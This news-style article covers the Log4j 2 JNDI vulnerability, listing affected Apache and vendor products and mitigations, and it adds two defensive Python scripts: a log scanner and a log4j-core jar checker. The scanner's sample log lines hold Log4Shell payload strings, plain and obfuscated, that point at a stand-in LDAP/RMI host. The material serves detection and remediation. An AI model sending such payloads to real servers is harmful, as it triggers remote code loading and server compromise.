About 17 Apache projects affected by the Log4j 2 vulnerability


In recent days there has been a great deal of discussion online about the Log4j vulnerability: several attack vectors have been found, and a number of working exploits that take advantage of it have been published.

The severity of the problem comes from the fact that Log4j 2 is a popular framework for organising logging in Java applications, and that it allows arbitrary code to be executed when a specially formatted value of the form "${jndi:URL}" is written to the log. The attack can be carried out against Java applications that log values obtained from external sources, for example applications that echo problematic values into error messages.

In practice, the attacker sends an HTTP request to the target system, which logs it with Log4j 2; the lookup embedded in the logged value then uses JNDI to make a request to a server controlled by the attacker. The vulnerability causes the exploited system to contact that server and execute the payload it receives. In many of the observed attacks the attacker's parameter pointed at a DNS logging service, used only to record the lookup and so identify vulnerable systems.
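The following script is an added example, not code from the article or from the Log4j project: it shows what the request described above looks like once it lands in a web server's access log, and how to detect it. The log lines are constructed (addresses from the documentation ranges), and the script goes slightly beyond the plain "${jndi:...}" form mentioned above by folding the nested ${lower:...}, ${upper:...} and ${...:-x} lookups that attackers used to evade simple string matching, in the order Log4j itself would expand them (innermost first).

```python
import re

# Constructed sample access-log lines (not from any real incident). Lines 0-2
# carry a JNDI lookup in the User-Agent field, plain or obfuscated; lines 3-4
# are benign, the last one deliberately containing a non-JNDI lookup.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/x}"',
    '198.51.100.4 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${env:HOME} HTTP/1.1" '
    '200 1024 "-" "curl/7.79"',
]

# A lookup with no further "${" inside it: the one Log4j's substitutor
# would expand first.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# After de-obfuscation we look for "${jndi:<scheme>:". Log4j matches the
# lookup prefix case-insensitively, so "${jNdI:" works for the attacker too.
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _fold(body):
    """Replacement for one innermost lookup body, or None to leave it alone.

    Three forms attackers use to hide the word "jndi" are folded:
      ${lower:X} -> x, ${upper:x} -> X, and ${anything:-X} -> X, since
    ':-' introduces a default that is used when the lookup itself fails
    (so ${::-j} is just a roundabout way to write "j").
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if sep and prefix.lower() == "lower":
        return key.lower()
    if sep and prefix.lower() == "upper":
        return key.upper()
    return None


def normalize_lookups(text):
    """Repeatedly fold innermost obfuscation lookups until nothing changes."""
    while True:
        changed = False

        def sub(match):
            nonlocal changed
            folded = _fold(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        text = INNERMOST.sub(sub, text)
        if not changed:
            return text


def find_jndi_lookup(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    lookup once de-obfuscated, otherwise None."""
    match = JNDI.search(normalize_lookups(line))
    return match.group(1).lower() if match else None


def scan(lines):
    """Return (line index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi_lookup(line)
        if scheme is not None:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for i, scheme in scan(SAMPLE_LOG_LINES):
        print(f"line {i}: JNDI lookup via {scheme}")
```

Matching on the raw string "${jndi:" alone would miss lines 1 and 2 of the sample; folding the nested lookups first is what makes the three hits show up. Only the lower, upper and default-value forms are folded here; other lookups (env, sys, date) are left untouched, which is why the last sample line is reported as clean.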

As our colleague Isaac has already explained:

This Log4j weakness allows exploitation of incorrect validation of input passed to LDAP, enabling remote code execution (RCE) and compromise of the server (confidentiality, data integrity and system availability). In addition, the problem, or rather the importance of this vulnerability, lies in the number of applications and servers that use it, including enterprise software and cloud services such as Apple iCloud, Steam, or popular video games such as Minecraft: Java Edition, Twitter, Cloudflare, Tencent, ElasticSearch, Redis, Elastic Logstash, and a long list of others.

On this subject, the Apache Software Foundation recently published a post summarising the projects affected by the critical vulnerability in Log4j 2 that allows arbitrary code to be executed on the server.

The following Apache projects are affected: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl and Calcite Avatica. The vulnerability also affected GitHub products, including GitHub.com, GitHub Enterprise Cloud and GitHub Enterprise Server.

In recent days there has been a notable increase in activity related to exploiting the vulnerability. For example, Check Point recorded, at the peak, about 100 exploitation attempts per minute against its honeypot servers, and Sophos announced the discovery of a new cryptocurrency-mining botnet built from systems running unpatched Log4j 2.

Regarding the information published so far about this problem:

  • The vulnerability has been confirmed in many official Docker images, including couchbase, elasticsearch, flink, solr, storm, etc.
  • The vulnerability is present in the MongoDB Atlas Search product.
  • The problem appears in various Cisco products, including Cisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco Advanced Web Security Reporting, Cisco Firepower Threat Defense (FTD), Cisco Identity Services Engine (ISE), Cisco CloudCenter, Cisco DNA Center, Cisco BroadWorks, etc.
  • The problem is present in IBM WebSphere Application Server and in the following Red Hat products: OpenShift, OpenShift Logging, OpenStack Platform, Integration Camel, CodeReady Studio, Data Grid, Fuse and AMQ Streams.
  • The issue has been confirmed in Junos Space Network Management Platform, Northstar Controller/Planner and Paragon Insights/Pathfinder/Planner.
  • Many products from Oracle, VMware, Broadcom and Amazon are also affected.

Apache projects not affected by the Log4j 2 vulnerability: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper and CloudStack.

Users of the affected packages are advised to install the updates released for them as soon as possible, to update the Log4j 2 version separately, or to set the log4j2.formatMsgNoLookups parameter to true (for example by adding the switch "-Dlog4j2.formatMsgNoLookups=true" at startup). Note that this parameter is only honoured by Log4j 2.10.0 and later; older releases ignore it, so for those the options are to upgrade or to remove the JndiLookup class from the log4j-core jar.

To lock down vulnerable systems that cannot be reached directly, it was proposed to use the Logout4Shell "vaccine", which delivers the attack itself but whose payload sets the Java properties "log4j2.formatMsgNoLookups=true", "com.sun.jndi.rmi.object.trustURLCodebase=false" and "com.sun.jndi.cosnaming.object.trustURLCodebase=false", preventing further exploitation of the vulnerability on unmanaged systems.
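The check below is an added example, not code from the article, from Apache or from the Logout4Shell project. It inspects a log4j-core jar the way the remediation advice above implies: read the version, see whether JndiLookup.class is still present, and take the formatMsgNoLookups flag into account only where the release honours it. The jars it runs against are constructed stand-ins (a manifest plus placeholder entries, no real bytecode). Reading the version from the manifest's Implementation-Version header, and treating 2.15.0 as the first release fixing CVE-2021-44228 (later releases addressed follow-up issues, so adjust the constant to your current floor), are the assumptions the code makes.

```python
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PACKAGE = "org/apache/logging/log4j/core/"
FIXED_VERSION = (2, 15, 0)        # first Log4j 2 release fixing CVE-2021-44228 (assumed floor)
FLAG_SUPPORTED_FROM = (2, 10, 0)  # log4j2.formatMsgNoLookups exists from 2.10.0
NO_LOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are
    dropped, which keeps 2.0-beta9 (vulnerable) below 2.15.0."""
    numbers = [int(n) for n in re.findall(r"\d+", text.split("-")[0])][:3]
    return tuple(numbers + [0] * (3 - len(numbers)))


def assess_log4j_core(jar_bytes, jvm_args=()):
    """Classify one log4j-core jar.

    Returns one of: 'not-log4j-core', 'patched', 'mitigated-class-removed',
    'mitigated-by-flag', 'vulnerable'. The version is read from the
    manifest's Implementation-Version header (an assumption about where the
    jar records it); if it is missing we assume the worst.
    """
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        manifest = ""
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    if not any(n.startswith(CORE_PACKAGE) for n in names):
        return "not-log4j-core"
    match = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
    version = parse_version(match.group(1)) if match else (0, 0, 0)
    if version >= FIXED_VERSION:
        return "patched"
    # Deleting JndiLookup.class from the jar is the documented mitigation for
    # releases too old to honour the flag; without the class the lookup
    # cannot run at all.
    if JNDI_LOOKUP_CLASS not in names:
        return "mitigated-class-removed"
    # The flag only helps on 2.10.0 and later: older releases ignore it.
    if NO_LOOKUPS_FLAG in jvm_args and version >= FLAG_SUPPORTED_FROM:
        return "mitigated-by-flag"
    return "vulnerable"


def build_jar(version, include_jndi_lookup):
    """Constructed stand-in for log4j-core-<version>.jar: a zip with a
    manifest and placeholder class entries (no real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "META-INF/MANIFEST.MF",
            "Manifest-Version: 1.0\r\n"
            "Implementation-Title: Apache Log4j Core\r\n"
            f"Implementation-Version: {version}\r\n",
        )
        zf.writestr(CORE_PACKAGE + "Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    cases = [
        ("2.14.1", True, ()),
        ("2.14.1", True, (NO_LOOKUPS_FLAG,)),
        ("2.9.1", True, (NO_LOOKUPS_FLAG,)),
        ("2.9.1", False, ()),
        ("2.15.0", True, ()),
    ]
    for version, has_class, args in cases:
        verdict = assess_log4j_core(build_jar(version, has_class), args)
        print(f"log4j-core {version:<8} JndiLookup={has_class!s:<5} "
              f"flag={'yes' if args else 'no':<3} -> {verdict}")
```

The third case is the one worth noticing: a 2.9.1 jar started with the flag is still reported as vulnerable, because the flag did not exist before 2.10.0. On real systems the jar is often nested inside a WAR or a fat jar, so a deployment scan has to open those archives recursively before applying this check.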

